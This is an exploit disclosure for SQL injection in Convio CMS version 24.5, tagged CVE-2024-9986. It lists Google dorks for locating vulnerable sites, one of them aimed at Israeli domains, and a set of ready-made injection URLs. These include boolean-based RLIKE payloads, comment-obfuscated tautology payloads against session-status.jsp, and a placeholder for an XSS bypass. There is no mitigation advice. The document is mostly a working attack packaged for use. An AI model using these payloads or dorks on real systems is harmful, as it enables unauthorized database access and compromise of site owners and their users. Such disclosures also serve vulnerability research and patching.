/*! - # VULNERABILITY: Convio CMS SQL injection Vulnerabilities version 24.5 (Work for ALL VERSION 24) - # Authenticated Persistent SQL injection - # GOOGLE DORK: site:.com /about/news/index.jsp?page=2 - # GOOGLE DORK: site:.il /about/news/index.jsp?page=2 - # DATE: November 2024 - # SECURITY RESEARCHER: E1.Coders - # VENDOR: Convio CMS [http://www.convio.com ] - # SOFTWARE LINK: http://www.convio.com/ - # CVE: CVE-2024-9986 - # CWE: CWE-89 */ ### -- [ Info: ] [i] A valid persistent SQL INJECTION vulnerability was discovered in of the Convio version 24.5 website installed. [i] Vulnerable parameter(s): - inurl:.com /about/news/index.jsp?page=2 ### -- [ Impact: ] [~] Malicious SQL code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Details: ] [~] vulnerable file is "index.jsp" and "session-status.jsp" ### -- [ EXPLOIT : ] https://www.TARGET.com/about/news/index.jsp?page=2{sql inject code} https://www.TARGET.com/about/news/index.jsp?page=2 RLIKE (case when 7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end) https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379-- https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'=' https://www.TARGET.com/search/?q=<XSS SCRIPT BYPASS> ### -- [ Contacts: ] [+] E-Mail: [email protected] [+] GitHub: @e1coders
References:
https://www.cve.org/CVERecord?id=CVE-2024-9986